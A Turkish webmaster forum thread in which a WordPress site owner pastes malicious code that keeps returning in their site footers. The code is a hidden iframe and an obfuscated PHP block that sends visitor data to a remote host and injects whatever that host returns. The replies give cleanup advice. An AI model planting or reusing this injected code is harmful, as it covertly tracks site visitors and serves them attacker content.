• 18-10-2013, 13:10:19
    #1
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Arkadaşlar hemen hemen tüm sitelerimin footerinde bu vardı kaldırdım ama belli süre sonra tekrar geliyor sitemde zararlı içerik nedeniyle googleda uyarı veriyor.

    <iframe src="http://joomlato.com/logs/errorr.php" width="6" height="5" /></body>
    </html><?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
    $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQuc Ghw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
    @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
    if ( $stCurlHandle !== NULL )
    {
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
    echo $sResult; // Statistic code end
    }
    curl_close($stCurlHandle);
    }
    }
    ?>
  • 18-10-2013, 13:16:03
    #2
    Üyeliği durduruldu
    Hack yemişsiniz, dosyalarınızı temizlemeniz lazım.
  • 18-10-2013, 13:21:34
    #3
    Yedek varsa sitenin yedgini at ugrasma ve ftp sfreni dgstr gclu bsey yap ve google a ilet

    harf hatalari için ozur. GlaxyS4 ile gönderildi
  • 18-10-2013, 13:25:33
    #4
    Üyeliği durduruldu
    Softurk adlı üyeden alıntı: mesajı görüntüle
    Hack yemişsiniz, dosyalarınızı temizlemeniz lazım.
    Nasıl dosyaları temizleyeceğim hocam ?

    mavikorku adlı üyeden alıntı: mesajı görüntüle
    Yedek varsa sitenin yedgini at ugrasma ve ftp sfreni dgstr gclu bsey yap ve google a ilet


    harf hatalari için ozur. GlaxyS4 ile gönderildi
    Maalesef yedek yok..
  • 18-10-2013, 13:34:06
    #5
    Üyeliği durduruldu
    Kirkbir adlı üyeden alıntı: mesajı görüntüle
    Nasıl dosyaları temizleyeceğim hocam ?
    Maalesef yedek yok..
    Scriptiniz ne?
    Tek tek dosyalara girip zararlı kodları temizlemeniz lazım.
    Ardından FTP şifrenizi değiştirmeniz.
  • 18-10-2013, 13:35:23
    #6
    Üyeliği durduruldu
    Softurk adlı üyeden alıntı: mesajı görüntüle
    Scriptiniz ne?
    Tek tek dosyalara girip zararlı kodları temizlemeniz lazım.
    Ardından FTP şifrenizi değiştirmeniz.
    Wordpress sistemim.
    Sadece zararlı kodu footerde gördüm başka yerde göremedim oradanda kaldırdım.
    Sonrada ftp şifremi değiştirdim başka yapmam gereken varmı?
  • 18-10-2013, 13:37:50
    #7
    Üyeliği durduruldu
    Kirkbir adlı üyeden alıntı: mesajı görüntüle
    Wordpress sistemim.
    Sadece zararlı kodu footerde gördüm başka yerde göremedim oradanda kaldırdım.
    Sonrada ftp şifremi değiştirdim başka yapmam gereken varmı?
    Daha önce kaldırdıktan sonra tekrar eklenmişse başka yerlerde de olması lazım. Tüm ftp'yi kontrol etmeniz lazım yada dosyaları tekrardan atın. Ama yedek almayı unutmayın.
  • 18-10-2013, 13:40:31
    #8
    agent ransack programını indirin, bu program bir dosyada ya da pcde arattığınız kelimeyi buluyor. bu programla kodu aratın ve bulaşan dosyaları tek tek temizleyin. sonrasında bütün ftp şifrelerinizi değiştirip, google webmaster toolsdan bildirin.
  • 18-10-2013, 15:13:34
    #9
    Kimlik doğrulama veya yönetimden onay bekliyor.
    kullanmış olduğunuz tema warezmi hocam?